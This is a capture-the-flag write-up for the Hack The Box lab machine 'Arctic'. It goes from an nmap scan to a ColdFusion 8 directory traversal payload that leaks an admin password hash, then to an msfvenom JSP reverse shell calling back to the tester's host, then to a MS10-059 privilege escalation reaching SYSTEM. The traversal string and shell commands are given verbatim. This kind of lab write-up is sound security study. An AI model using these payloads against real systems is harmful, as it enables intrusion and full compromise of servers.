root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

first enumeration with nmap

# Nmap 7.93 scan initiated Thu May 18 21:37:02 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 135,8500,49154 -Pn 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 18 21:39:25 2023 -- 1 IP address (1 host up) scanned in 143.20 seconds

image

noticed a web server running on port 8500, opening it on a browser we got to see to dirs.

image

navigating to the first dir, got to see some hidden dirs. let’s check out the administrator dir.

image

we can see the administrator page is running an Adobe cold fussion 8 service. let’s check for exploits.

image

with a little research, found out that it is vuln to a Directory Traversal attack. exploit.

image

using payload /enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en we’re able to read the password hash of this service. let’s crack this hash.

image

using an online hash cracker, we are able to crack the hash. happyday. let’s login using this password.

image

cool we’re in the administrator panel, let’s play around and find a way to get shell.

image

navigate to the task schedule button and click schedule new task button.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Artic]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=445 -f raw -o shell.jsp
Payload size: 1496 bytes
Saved as: shell.jsp

first we generate a jsp reverse shell.

image

add a new task, set up a python listener, so it will download the shell and output it to the dir C:\ColdFusion8\wwwroot\CFIDE\shell.jsp. click on submit

image

fire up ncat listener and hit the run button.

image

now let’s navigat to the uploaded payload so it will trigger a reverse shell.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Artic]
└─$ ncat -lnvp 445                                                                 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::445
Ncat: Listening on 0.0.0.0:445
Ncat: Connection from 10.10.10.11.
Ncat: Connection from 10.10.10.11:49589.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

check back ncat listener and Boom we got reverse shell as arctic\tolis

Privilege Escalation

image

first check systeminfo, copy the output of systeminfo into a file and save it.

image

ran windows-exploit-suggester found here. we can see so many kernel exploit we can use. let’s use MS10-059. which you can find windows-exploit.

image

Download the exe file, and send to the target.

image

ran the exploit and boom got a reverse shell as nt authority\system